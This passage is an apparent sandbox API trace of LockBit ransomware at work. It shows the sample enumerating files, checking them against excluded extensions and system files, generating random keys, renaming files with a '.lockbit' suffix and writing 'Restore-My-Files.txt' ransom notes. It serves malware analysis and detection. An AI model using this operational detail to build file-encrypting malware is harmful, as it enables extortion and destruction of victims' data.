[0103.314] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0103.314] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0103.314] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5133d8d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x212c, dwReserved0=0x0, dwReserved1=0x0, cFileName="AN04225_.WMF", cAlternateFileName="")) returned 1 [0103.315] lstrcmpiW (lpString1=".", lpString2="AN04225_.WMF") returned -1 [0103.315] lstrcmpiW (lpString1="..", lpString2="AN04225_.WMF") returned -1 [0103.315] PathFindExtensionW (pszPath="AN04225_.WMF") returned=".WMF" [0103.315] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0103.315] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0103.315] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0103.315] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0103.315] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0103.315] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0103.315] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0103.315] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0103.315] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0103.315] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0103.315] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0103.315] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0103.315] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0103.315] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0103.315] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0103.316] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0103.316] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0103.316] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0103.316] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0103.316] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0103.316] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0103.316] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0103.316] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0103.316] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0103.316] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0103.316] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0103.316] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0103.316] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0103.316] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0103.316] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0103.316] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0103.316] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0103.316] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0103.317] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0103.317] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0103.317] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0103.317] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0103.317] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0103.317] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0103.317] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0103.317] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0103.317] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0103.317] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0103.317] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0103.317] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0103.317] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0103.317] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0103.317] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="AN04225_.WMF") returned 1 [0103.317] lstrcmpiW (lpString1="ntldr", lpString2="AN04225_.WMF") returned 1 [0103.317] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="AN04225_.WMF") returned 1 [0103.317] lstrcmpiW (lpString1="bootsect.bak", lpString2="AN04225_.WMF") returned 1 [0103.317] lstrcmpiW (lpString1="autorun.inf", lpString2="AN04225_.WMF") returned 1 [0103.318] lstrcmpiW (lpString1="thumbs.db", lpString2="AN04225_.WMF") returned 1 [0103.318] lstrcmpiW (lpString1="iconcache.db", lpString2="AN04225_.WMF") returned 1 [0103.318] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0103.318] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04225_.WMF") returned=".WMF" [0103.318] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0103.318] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0103.318] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0103.318] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0103.318] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0103.318] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0103.318] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0103.318] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0103.318] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0103.318] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0103.318] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0103.318] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0103.318] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0103.318] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0103.318] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0103.319] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0103.319] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0103.319] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0103.319] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0103.319] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0103.319] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0103.319] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0103.319] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0103.319] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0103.319] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0103.319] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0103.319] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0103.319] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0103.319] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04225_.WMF.lockbit") returned 72 [0103.319] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04225_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04225_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13c8 [0103.320] CreateIoCompletionPort (FileHandle=0x13c8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0103.320] malloc (_Size=0x40068) returned 0x3d70048 [0103.320] GetFileSizeEx (in: hFile=0x13c8, lpFileSize=0x3d70060 | out: lpFileSize=0x3d70060*=8492) returned 1 [0103.320] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.321] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.321] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db007c) returned 0x0 [0103.321] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.322] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.322] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db008c) returned 0x0 [0103.322] ReadFile (in: hFile=0x13c8, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0103.329] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04225_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04225_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0103.329] malloc (_Size=0xa6) returned 0x77d800 [0103.329] NtSetInformationFile (FileHandle=0x13c8, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0103.329] free (_Block=0x77d800) [0103.329] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04225_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0103.330] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0103.330] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0103.330] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5eb8e810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1e7c, dwReserved0=0x0, dwReserved1=0x0, cFileName="AN04235_.WMF", cAlternateFileName="")) returned 1 [0103.330] lstrcmpiW (lpString1=".", lpString2="AN04235_.WMF") returned -1 [0103.330] lstrcmpiW (lpString1="..", lpString2="AN04235_.WMF") returned -1 [0103.330] PathFindExtensionW (pszPath="AN04235_.WMF") returned=".WMF" [0103.330] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0103.330] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0103.330] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0103.330] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0103.330] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0103.330] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0103.330] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0103.330] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0103.330] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0103.330] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0103.331] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0103.331] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0103.331] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0103.331] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0103.331] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0103.331] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0103.331] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0103.331] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0103.331] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0103.331] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0103.331] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0103.331] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0103.331] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0103.331] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0103.331] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0103.331] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0103.331] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0103.331] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0103.331] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0103.332] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0103.332] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0103.332] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0103.332] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0103.332] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0103.332] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0103.332] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0103.332] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0103.332] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0103.332] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0103.332] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0103.332] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0103.332] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0103.332] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0103.332] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0103.332] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0103.332] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0103.332] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0103.332] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="AN04235_.WMF") returned 1 [0103.332] lstrcmpiW (lpString1="ntldr", lpString2="AN04235_.WMF") returned 1 [0103.332] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="AN04235_.WMF") returned 1 [0103.333] lstrcmpiW (lpString1="bootsect.bak", lpString2="AN04235_.WMF") returned 1 [0103.333] lstrcmpiW (lpString1="autorun.inf", lpString2="AN04235_.WMF") returned 1 [0103.333] lstrcmpiW (lpString1="thumbs.db", lpString2="AN04235_.WMF") returned 1 [0103.333] lstrcmpiW (lpString1="iconcache.db", lpString2="AN04235_.WMF") returned 1 [0103.333] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0103.333] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04235_.WMF") returned=".WMF" [0103.333] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0103.333] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0103.333] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0103.333] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0103.333] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0103.333] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0103.333] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0103.333] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0103.333] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0103.333] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0103.333] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0103.333] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0103.333] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0103.333] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0103.334] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0103.334] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0103.334] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0103.334] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0103.334] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0103.334] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0103.334] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0103.334] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0103.334] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0103.334] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0103.334] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0103.334] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0103.334] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0103.334] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0103.334] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04235_.WMF.lockbit") returned 72 [0103.334] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04235_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04235_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13b4 [0103.335] CreateIoCompletionPort (FileHandle=0x13b4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0103.335] malloc (_Size=0x40068) returned 0x3e70008 [0103.335] GetFileSizeEx (in: hFile=0x13b4, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=7804) returned 1 [0103.335] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.336] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.336] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0103.336] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0103.337] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0103.337] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0103.337] ReadFile (in: hFile=0x13b4, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0103.344] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04235_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04235_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0103.344] malloc (_Size=0xa6) returned 0x77d800 [0103.344] NtSetInformationFile (FileHandle=0x13b4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0103.345] free (_Block=0x77d800) [0103.345] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04235_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0103.345] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0103.345] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0103.345] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x513d5e50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1e7c, dwReserved0=0x0, dwReserved1=0x0, cFileName="AN04267_.WMF", cAlternateFileName="")) returned 1 [0103.345] lstrcmpiW (lpString1=".", lpString2="AN04267_.WMF") returned -1 [0103.345] lstrcmpiW (lpString1="..", lpString2="AN04267_.WMF") returned -1 [0103.345] PathFindExtensionW (pszPath="AN04267_.WMF") returned=".WMF" [0103.346] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0103.346] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0103.346] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0103.346] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0103.346] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0103.346] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0103.346] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0103.346] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0103.346] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0103.346] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0103.346] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0103.346] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0103.346] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0103.346] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0103.346] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0103.346] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0103.346] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0103.346] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0103.346] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0103.346] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0103.346] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0103.346] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0103.347] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0103.347] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0103.347] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0103.347] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0103.347] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0103.347] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0103.347] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0103.347] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0103.347] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0103.347] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0103.347] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0103.347] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0103.347] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0103.347] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0103.347] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0103.347] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0103.347] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0103.347] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0103.347] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0103.347] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0103.347] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0103.348] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0103.348] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0103.348] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0103.348] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0103.348] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="AN04267_.WMF") returned 1 [0103.348] lstrcmpiW (lpString1="ntldr", lpString2="AN04267_.WMF") returned 1 [0103.348] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="AN04267_.WMF") returned 1 [0103.348] lstrcmpiW (lpString1="bootsect.bak", lpString2="AN04267_.WMF") returned 1 [0103.348] lstrcmpiW (lpString1="autorun.inf", lpString2="AN04267_.WMF") returned 1 [0103.348] lstrcmpiW (lpString1="thumbs.db", lpString2="AN04267_.WMF") returned 1 [0103.348] lstrcmpiW (lpString1="iconcache.db", lpString2="AN04267_.WMF") returned 1 [0103.348] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0103.348] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04267_.WMF") returned=".WMF" [0103.348] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0103.348] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0103.348] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0103.348] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0103.348] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0103.348] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0103.348] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0103.348] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0103.348] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0103.349] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0103.349] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") 